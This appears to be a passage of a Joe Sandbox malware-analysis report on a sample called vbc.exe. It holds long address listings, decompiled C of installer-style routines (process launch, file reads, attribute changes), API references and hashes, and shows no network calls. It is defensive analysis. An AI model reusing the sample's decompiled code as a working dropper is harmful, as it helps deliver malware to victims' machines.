                          0x004060f9
                          0x004060fc
                          0x00406102
                          0x00406104
                          0x00406104
                          0x00406104
                          0x00406107
                          0x0040610a
                          0x0040610a
                          0x0040610d
                          0x00406110
                          0x00000000
                          0x00000000
                          0x00406116
                          0x0040611c
                          0x00000000
                          0x00000000
                          0x00406122
                          0x00406122
                          0x00406126
                          0x00406129
                          0x0040612c
                          0x0040612f
                          0x00406132
                          0x00406133
                          0x00406136
                          0x00406138
                          0x0040613e
                          0x00406141
                          0x00406144
                          0x00406147
                          0x0040614a
                          0x0040614d
                          0x00406150
                          0x0040616c
                          0x0040616f
                          0x00406172
                          0x00406175
                          0x0040617c
                          0x00406180
                          0x00406182
                          0x00406186
                          0x00406152
                          0x00406152
                          0x00406156
                          0x0040615e
                          0x00406163
                          0x00406165
                          0x00406167
                          0x00406167
                          0x00406189
                          0x00406190
                          0x00406193
                          0x00000000
                          0x00406199
                          0x00000000
                          0x00406199
                          0x00000000
                          0x0040619e
                          0x0040619e
                          0x004061a2
                          0x00406862
                          0x00000000
                          0x00406862
                          0x004061a8
                          0x004061ab
                          0x004061ae
                          0x004061b2
                          0x004061b5
                          0x004061bb
                          0x004061bd
                          0x004061bd
                          0x004061bd
                          0x004061c0
                          0x004061c3
                          0x004061c3
                          0x004061c3
                          0x004061c9
                          0x00000000
                          0x00000000
                          0x004061cb
                          0x004061ce
                          0x004061d1
                          0x004061d4
                          0x004061d7
                          0x004061da
                          0x004061dd
                          0x004061e0
                          0x004061e3
                          0x004061e6
                          0x004061e9
                          0x00406201
                          0x00406204
                          0x00406207
                          0x0040620a
                          0x0040620a
                          0x0040620d
                          0x00406211
                          0x00406213
                          0x004061eb
                          0x004061eb
                          0x004061f3
                          0x004061f8
                          0x004061fa
                          0x004061fc
                          0x004061fc
                          0x00406216
                          0x0040621d
                          0x00406220
                          0x00000000
                          0x00406222
                          0x00000000
                          0x00406222
                          0x00406220
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00406227
                          0x00000000
                          0x00000000
                          0x00406262
                          0x00406262
                          0x00406266
                          0x0040686e
                          0x00000000
                          0x0040686e
                          0x0040626c
                          0x0040626f
                          0x00406272
                          0x00406276
                          0x00406279
                          0x0040627f
                          0x00406281
                          0x00406281
                          0x00406281
                          0x00406284
                          0x00406287
                          0x00406287
                          0x0040628d
                          0x0040622b
                          0x0040622b
                          0x0040622e
                          0x00000000
                          0x0040622e
                          0x0040628f
                          0x0040628f
                          0x00406292
                          0x00406295
                          0x00406298
                          0x0040629b
                          0x0040629e
                          0x004062a1
                          0x004062a4
                          0x004062a7
                          0x004062aa
                          0x004062ad
                          0x004062c5
                          0x004062c8
                          0x004062cb
                          0x004062ce
                          0x004062ce
                          0x004062d1
                          0x004062d5
                          0x004062d7
                          0x004062af
                          0x004062af
                          0x004062b7
                          0x004062bc
                          0x004062be
                          0x004062c0
                          0x004062c0
                          0x004062da
                          0x004062e1
                          0x004062e4
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x004062e6
                          0x00000000
                          0x00406573
                          0x00406573
                          0x00406577
                          0x0040689e
                          0x00000000
                          0x0040689e
                          0x0040657d
                          0x00406580
                          0x00406583
                          0x00406587
                          0x0040658a
                          0x00406590
                          0x00406592
                          0x00406592
                          0x00406592
                          0x00406595
                          0x00000000
                          0x00000000
                          0x00406343
                          0x00406343
                          0x00406346
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x00000000
                          0x00406682
                          0x00406686
                          0x004066a8
                          0x004066ab
                          0x004066b5
                          0x004066b8
                          0x004066b8
                          0x00000000
                          0x004066b8
                          0x004066b8
                          0x00406688
                          0x0040668b
                          0x0040668f
                          0x00406692
                          0x00406692
                          0x00406695
                          0x00000000
                          0x00000000
                          0x0040673f
                          0x00406743
                          0x00406761
                          0x00406761
                          0x00406761
                          0x00406768
                          0x0040676f
                          0x00406776
                          0x00406776
                          0x00000000
                          0x00406776
                          0x00406745
                          0x00406748
                          0x0040674b
                          0x0040674e
                          0x00406755
                          0x00406699
                          0x00406699
                          0x0040669c
                          0x00000000
                          0x00000000
                          0x00406830
                          0x00406833
                          0x00406734
                          0x00000000
                          0x00000000
                          0x0040646a
                          0x0040646c
                          0x00406473
                          0x00406474
                          0x00406476
                          0x00406479
                          0x00000000
                          0x00000000
                          0x00406481
                          0x00406484
                          0x00406487
                          0x00406489
                          0x0040648b
                          0x0040648b
                          0x0040648c
                          0x0040648f
                          0x00406496
                          0x00406499
                          0x004064a7
                          0x00000000
                          0x00000000
                          0x0040677d
                          0x0040677d
                          0x00406780
                          0x00406787
                          0x00000000
                          0x00000000
                          0x0040678c
                          0x0040678c
                          0x00406790
                          0x004068c8
                          0x00000000
                          0x004068c8
                          0x00406796
                          0x00406799
                          0x0040679c
                          0x004067a0
                          0x004067a3
                          0x004067a9
                          0x004067ab
                          0x004067ab
                          0x004067ab
                          0x004067ae
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b4
                          0x004067b4
                          0x004067b8
                          0x00406818
                          0x0040681b
                          0x00406820
                          0x00406821
                          0x00406823
                          0x00406825
                          0x00406828
                          0x00406734
                          0x00406734
                          0x00000000
                          0x0040673a
                          0x00406734
                          0x004067ba
                          0x004067c0
                          0x004067c3
                          0x004067c6
                          0x004067c9
                          0x004067cc
                          0x004067cf
                          0x004067d2
                          0x004067d5
                          0x004067d8
                          0x004067db
                          0x004067f4
                          0x004067f7
                          0x004067fa
                          0x004067fd
                          0x00406801
                          0x00406803
                          0x00406803
                          0x00406804
                          0x00406807
                          0x004067dd
                          0x004067dd
                          0x004067e5
                          0x004067ea
                          0x004067ec
                          0x004067ef
                          0x004067ef
                          0x0040680a
                          0x00406811
                          0x00000000
                          0x00406813
                          0x00000000
                          0x00406813
                          0x00000000
                          0x004064af
                          0x004064b2
                          0x004064e8
                          0x00406618
                          0x00406618
                          0x00406618
                          0x00406618
                          0x0040661b
                          0x0040661b
                          0x0040661e
                          0x00406620
                          0x004068aa
                          0x00000000
                          0x004068aa
                          0x00406626
                          0x00406629
                          0x00000000
                          0x00000000
                          0x0040662f
                          0x00406633
                          0x00406636
                          0x00406636
                          0x00406636
                          0x00000000
                          0x00406636
                          0x004064b4
                          0x004064b6
                          0x004064b8
                          0x004064ba
                          0x004064bd
                          0x004064be
                          0x004064c0
                          0x004064c2
                          0x004064c5
                          0x004064c8
                          0x004064de
                          0x004064e3
                          0x0040651b
                          0x0040651b
                          0x0040651f
                          0x0040654b
                          0x0040654d
                          0x00406554
                          0x00406557
                          0x0040655a
                          0x0040655a
                          0x0040655f
                          0x0040655f
                          0x00406561
                          0x00406564
                          0x0040656b
                          0x0040656e
                          0x0040659b
                          0x0040659b
                          0x0040659e
                          0x004065a1
                          0x00406615
                          0x00406615
                          0x00406615
                          0x00000000
                          0x00406615
                          0x004065a3
                          0x004065a9
                          0x004065ac
                          0x004065af
                          0x004065b2
                          0x004065b5
                          0x004065b8
                          0x004065bb
                          0x004065be
                          0x004065c1
                          0x004065c4
                          0x004065dd
                          0x004065df
                          0x004065e2
                          0x004065e3
                          0x004065e6
                          0x004065e8
                          0x004065eb
                          0x004065ed
                          0x004065ef
                          0x004065f2
                          0x004065f4
                          0x004065f7
                          0x004065fb
                          0x004065fd
                          0x004065fd
                          0x004065fe
                          0x00406601
                          0x00406604
                          0x004065c6
                          0x004065c6
                          0x004065ce
                          0x004065d3
                          0x004065d5
                          0x004065d8
                          0x004065d8
                          0x00406607
                          0x0040660e
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00000000
                          0x00406610
                          0x00000000
                          0x00406610
                          0x0040660e
                          0x00406521
                          0x00406524
                          0x00406526
                          0x00406529
                          0x0040652c
                          0x0040652f
                          0x00406531
                          0x00406534
                          0x00406537
                          0x00406537
                          0x0040653a
                          0x0040653a
                          0x0040653d
                          0x00406544
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00000000
                          0x00406546
                          0x00000000
                          0x00406546
                          0x00406544
                          0x004064ca
                          0x004064cd
                          0x004064cf
                          0x004064d2
                          0x00000000
                          0x00000000
                          0x00406231
                          0x00406231
                          0x00406235
                          0x0040687a
                          0x00000000
                          0x0040687a
                          0x0040623b
                          0x0040623e
                          0x00406241
                          0x00406244
                          0x00406247
                          0x0040624a
                          0x0040624d
                          0x0040624f
                          0x00406252
                          0x00406255
                          0x00406258
                          0x0040625a
                          0x0040625a
                          0x0040625a
                          0x00000000
                          0x00000000
                          0x004063bc
                          0x004063bc
                          0x004063c0
                          0x00406886
                          0x00000000
                          0x00406886
                          0x004063c6
                          0x004063c9
                          0x004063cc
                          0x004063cf
                          0x004063d1
                          0x004063d1
                          0x004063d1
                          0x004063d4
                          0x004063d7
                          0x004063da
                          0x004063dd
                          0x004063e0
                          0x004063e3
                          0x004063e4
                          0x004063e6
                          0x004063e6
                          0x004063e6
                          0x004063e9
                          0x004063ec
                          0x004063ef
                          0x004063f2
                          0x004063f2
                          0x004063f2
                          0x004063f5
                          0x004063f7
                          0x004063f7
                          0x00000000
                          0x00000000
                          0x00406639
                          0x00406639
                          0x00406639
                          0x0040663d
                          0x00000000
                          0x00000000
                          0x00406643
                          0x00406646
                          0x00406649
                          0x0040664c
                          0x0040664e
                          0x0040664e
                          0x0040664e
                          0x00406651
                          0x00406654
                          0x00406657
                          0x0040665a
                          0x0040665d
                          0x00406660
                          0x00406661
                          0x00406663
                          0x00406663
                          0x00406663
                          0x00406666
                          0x00406669
                          0x0040666c
                          0x0040666f
                          0x00406672
                          0x00406676
                          0x00406678
                          0x0040667b
                          0x00000000
                          0x0040667d
                          0x004063fa
                          0x004063fa
                          0x00000000
                          0x004063fa
                          0x0040667b
                          0x004068b0
                          0x00000000
                          0x00000000
                          0x00405edf
                          0x004068e7
                          0x004068e7
                          0x00000000
                          0x004068e7
                          0x00406734
                          0x004066bb
                          0x004066b8

                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
                          • Instruction ID: 03af6c1e27b970ccc0602dedbaa06cf660f45ac3eaa39f8bc43b8226cdf4d636
                          • Opcode Fuzzy Hash: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
                          • Instruction Fuzzy Hash: 46715571D00229DFEF28CF98C844BADBBB1FB44305F15806AD816BB281C7789A96DF44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00401E1B Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON
                          Download Yara Rule
                          C-Code - Quality: 82%
                          			E00401E1B() {
				void* _t15;
				void* _t24;
				void* _t26;
				void* _t31;

				_t28 = E004029E8(_t24);
				E00404E23(0xffffffeb, _t13);
				_t15 = E004052E5(_t28); // executed
				 *(_t31 + 8) = _t15;
				if(_t15 == _t24) {
					 *((intOrPtr*)(_t31 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t31 - 0x1c)) != _t24) {
						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
							E00405DDC(0xf);
						}
						GetExitCodeProcess( *(_t31 + 8), _t31 - 8); // executed
						if( *((intOrPtr*)(_t31 - 0x20)) < _t24) {
							if( *(_t31 - 8) != _t24) {
								 *((intOrPtr*)(_t31 - 4)) = 1;
							}
						} else {
							E004059E3(_t26,  *(_t31 - 8));
						}
					}
					_push( *(_t31 + 8));
					CloseHandle();
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t31 - 4));
				return 0;
			}







                          0x00401e21
                          0x00401e26
                          0x00401e2c
                          0x00401e33
                          0x00401e36
                          0x0040264e
                          0x00401e3c
                          0x00401e3f
                          0x00401e50
                          0x00401e4b
                          0x00401e4b
                          0x00401e65
                          0x00401e6e
                          0x00401e7e
                          0x00401e80
                          0x00401e80
                          0x00401e70
                          0x00401e74
                          0x00401e74
                          0x00401e6e
                          0x00401e87
                          0x00401e8a
                          0x00401e8a
                          0x00402880
                          0x0040288c

                          APIs
                            • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                            • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                            • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                            • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                            • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EB7
                            • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404ED1
                            • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EDF
                            • Part of subcall function 004052E5: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004224A0,Error launching installer), ref: 0040530A
                            • Part of subcall function 004052E5: CloseHandle.KERNEL32(?), ref: 00405317
                          • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E55
                          • GetExitCodeProcess.KERNELBASE(?,?), ref: 00401E65
                          • CloseHandle.KERNEL32(?), ref: 00401E8A
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                          • String ID:
                          • API String ID: 3521207402-0
                          • Opcode ID: 3016e669bbaa0abdb16a27774c796dbae6618c448dd831d606e4ec67ec548621
                          • Instruction ID: bfc20476be5fc53685a683b8d0a1b3bf328c1b7f56aae3e5f2b845df029897a9
                          • Opcode Fuzzy Hash: 3016e669bbaa0abdb16a27774c796dbae6618c448dd831d606e4ec67ec548621
                          • Instruction Fuzzy Hash: 63016971904104EBCF11AFA1CD85AAE7A71EF01358F20807BEA01B61E1C7798A81DB9A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004035A6 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 19COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E004035A6() {
				void* _t1;
				void* _t2;
				void* _t3;
				void* _t6;
				signed int _t11;

				_t1 =  *0x409010; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1); // executed
					 *0x409010 =  *0x409010 | 0xffffffff;
				}
				_t2 =  *0x409014; // 0xffffffff
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x409014 =  *0x409014 | 0xffffffff;
					_t11 =  *0x409014;
				}
				_t3 = E004053AA(_t6, _t11, "C:\\Users\\Albus\\AppData\\Local\\Temp\\nsf9C33.tmp\\", 7); // executed
				return _t3;
			}








                          0x004035a6
                          0x004035b5
                          0x004035b8
                          0x004035ba
                          0x004035ba
                          0x004035c1
                          0x004035c9
                          0x004035cc
                          0x004035ce
                          0x004035ce
                          0x004035ce
                          0x004035dc
                          0x004035e2

                          APIs
                          • CloseHandle.KERNELBASE(FFFFFFFF), ref: 004035B8
                          • CloseHandle.KERNEL32(FFFFFFFF), ref: 004035CC
                          Strings
                          • C:\Users\user\AppData\Local\Temp\nsf9C33.tmp\, xrefs: 004035D7
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: CloseHandle
                          • String ID: C:\Users\user\AppData\Local\Temp\nsf9C33.tmp\
                          • API String ID: 2962429428-1235799324
                          • Opcode ID: be55e5b8e427b8cdde6b00384d0871a0199eafcfb6d9273a338719d70b1cafbd
                          • Instruction ID: d1c705f3b128fbcbfce68daea097d08065639d5fc9d79a491b5de1c55189a292
                          • Opcode Fuzzy Hash: be55e5b8e427b8cdde6b00384d0871a0199eafcfb6d9273a338719d70b1cafbd
                          • Instruction Fuzzy Hash: 1EE0C230904610A6C630AF3CBE499063A286B413317200B22F174F21F1C778AE429AA9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 69%
                          			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				intOrPtr _t15;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t15 =  *0x423ed0; // 0x8c1564
					_t6 = _t17 * 0x1c + _t15;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42368c =  *0x42368c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42368c, 0x7530,  *0x423674), 0);
					}
				}
				return 0;
			}












                          0x0040138a
                          0x004013fa
                          0x00401392
                          0x0040139b
                          0x004013a0
                          0x00000000
                          0x00000000
                          0x004013a2
                          0x004013a3
                          0x004013ad
                          0x00000000
                          0x00401404
                          0x004013b0
                          0x004013b7
                          0x004013bd
                          0x004013be
                          0x004013c0
                          0x004013c2
                          0x004013b9
                          0x004013b9
                          0x004013ba
                          0x004013ba
                          0x004013c9
                          0x004013cb
                          0x004013f4
                          0x004013f4
                          0x004013c9
                          0x00000000

                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          • Opcode ID: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                          • Instruction ID: b71ad761f0ea07ecc4e6183a90c0cd8288537aab3e92bb5761005deb6e4a9b1f
                          • Opcode Fuzzy Hash: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                          • Instruction Fuzzy Hash: 20014431B24210ABE7291B388D08B2A32ADE714315F10423FF801F32F0D678DC028B4C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0040575C Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                          Download Yara Rule
                          C-Code - Quality: 68%
                          			E0040575C(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                          0x00405760
                          0x0040576d
                          0x00405782
                          0x00405788

                          APIs
                          • GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00405760
                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: File$AttributesCreate
                          • String ID:
                          • API String ID: 415043291-0
                          • Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                          • Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
                          • Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                          • Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0040573D Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0040573D(CHAR* _a4) {
				signed char _t3;
				int _t5;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					_t5 = SetFileAttributesA(_a4, _t3 & 0x000000fe); // executed
					return _t5;
				}
				return _t3;
			}





                          0x00405741
                          0x0040574a
                          0x00405753
                          0x00000000
                          0x00405753
                          0x00405759

                          APIs
                          • GetFileAttributesA.KERNELBASE(?,00405548,?,?,?), ref: 00405741
                          • SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405753
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                          • Instruction ID: 88d4634cff9a4ddd1fee40d2dea465eb4d792ab4199cb35d7d0d1e1f6e6e1bf9
                          • Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                          • Instruction Fuzzy Hash: CAC04CB1808501EBD6016B24DF0D81F7B66EB50321B108B35F569E00F0C7755C66EA1A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004031A8 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E004031A8(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409010, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                          0x004031ac
                          0x004031bf
                          0x004031c7
                          0x00000000
                          0x004031ce
                          0x00000000
                          0x004031d0

                          APIs
                          • ReadFile.KERNELBASE(00409128,00000000,00000000,00000000,00413038), ref: 004031BF
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                          • Instruction ID: b8f1ad64850fa721b7c3123cc302f733781f6218d307da9d2aa6486ecc23217a
                          • Opcode Fuzzy Hash: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                          • Instruction Fuzzy Hash: 4BE08632254119BBCF105E619C00AD73F5CEB0A3A2F008432FD55E9190D230EA11DBA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004031DA Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E004031DA(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409010, _a4, 0, 0); // executed
				return _t2;
			}




                          0x004031e8
                          0x004031ee

                          APIs
                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,00007DE4), ref: 004031E8
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
